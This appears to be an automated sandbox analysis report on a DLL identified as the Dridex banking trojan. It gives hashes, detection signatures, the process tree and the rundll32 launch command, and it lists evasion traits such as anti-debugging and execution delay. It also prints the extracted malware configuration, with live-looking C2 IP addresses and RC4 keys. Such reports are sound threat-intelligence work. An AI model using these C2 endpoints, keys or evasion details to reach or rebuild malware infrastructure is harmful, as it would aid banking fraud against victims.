Play interactive tour

Edit tour

Windows Analysis Report triage_dropped_file.dll

Overview

General Information

Sample Name:	triage_dropped_file.dll
Analysis ID:	544526
MD5:	7d424a845f21f905b17fb1e4ece26bc4
SHA1:	129162c17505204008b8c6345f78d8bd8e9d9548
SHA256:	7f62e9d0e2cb7358202052b4b20f43cec7eed7db11c57cfb372f8fddfb9307a3
Tags:	22201dlldridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 2332 cmdline: loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 4700 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6376 cmdline: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 672 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.296075681.000000006EB21000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000002.324884043.000000006EB21000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.298180742.000000006EB21000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000001.292482173.000000006EB20000.00000004.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
2.2.rundll32.exe.6eb20000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.1.rundll32.exe.6eb20000.0.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.1.rundll32.exe.6eb20000.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6eb20000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6eb20000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6eb20000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4700, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, ProcessId: 6376

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.loaddll32.exe.6eb20000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: triage_dropped_file.dll

ReversingLabs: Detection: 18%

Source: triage_dropped_file.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: triage_dropped_file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.302815879.0000000004700000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.302841725.0000000002A15000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303283707.0000000002A15000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000005.00000002.319844575.0000000002352000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.299917614.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.302836365.0000000002A0F000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303491790.0000000002A0F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdbm source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.303138336.0000000002A1B000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: triage_dropped_file.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.302836365.0000000002A0F000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303491790.0000000002A0F000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbv source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.299917614.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbs source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdba source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdby source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdbe source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.303138336.0000000002A1B000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000005.00000003.302841725.0000000002A15000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303283707.0000000002A15000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdbg source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb[ source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000005.00000003.318664228.000000000467A000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000002.320153185.000000000467A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.298260895.000000006EB3F000.00000002.00020000.sdmp	String found in binary or memory: http://www.baxleystamps.comDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 2.2.rundll32.exe.6eb20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.rundll32.exe.6eb20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.rundll32.exe.6eb20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6eb20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6eb20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.296075681.000000006EB21000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.324884043.000000006EB21000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.298180742.000000006EB21000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.292482173.000000006EB20000.00000004.00020000.sdmp, type: MEMORY

System Summary:

Source: triage_dropped_file.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: triage_dropped_file.dll

Binary or memory string: OriginalFilenameShi.dllD vs triage_dropped_file.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 672

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB30730	0_2_6EB30730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB39370	0_2_6EB39370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB21494	0_2_6EB21494
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB2A4E8	0_2_6EB2A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB3143C	0_2_6EB3143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB28428	0_2_6EB28428
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB30730	2_1_6EB30730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB39370	2_1_6EB39370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB21494	2_1_6EB21494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB2A4E8	2_1_6EB2A4E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB3143C	2_1_6EB3143C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB28428	2_1_6EB28428
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB29088	2_1_6EB29088

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB32234 NtDelayExecution,		0_2_6EB32234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB32820 NtAllocateVirtualMemory,		0_2_6EB32820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: triage_dropped_file.dll

ReversingLabs: Detection: 18%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 672
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6376

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB361.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: triage_dropped_file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: triage_dropped_file.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.302815879.0000000004700000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.302841725.0000000002A15000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303283707.0000000002A15000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000005.00000002.319844575.0000000002352000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.299917614.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.302836365.0000000002A0F000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303491790.0000000002A0F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdbm source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.303138336.0000000002A1B000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: triage_dropped_file.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.302836365.0000000002A0F000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303491790.0000000002A0F000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbv source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.299917614.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdbs source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdba source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdby source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdbe source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000005.00000003.303138336.0000000002A1B000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000005.00000003.307774943.0000000004B50000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000005.00000003.302841725.0000000002A15000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000003.303283707.0000000002A15000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.307766584.00000000049C1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdbg source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb[ source: WerFault.exe, 00000005.00000003.307779684.0000000004B56000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EB2F6A8 push esi; mov dword ptr [esp], 00000000h	0_2_6EB2F6A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB2F6A8 push esi; mov dword ptr [esp], 00000000h	2_1_6EB2F6A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB3B77F push eax; ret	2_1_6EB3B780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB3B8CB push esp; ret	2_1_6EB3B8CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_1_6EB3B847 push esp; ret	2_1_6EB3B8CA

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
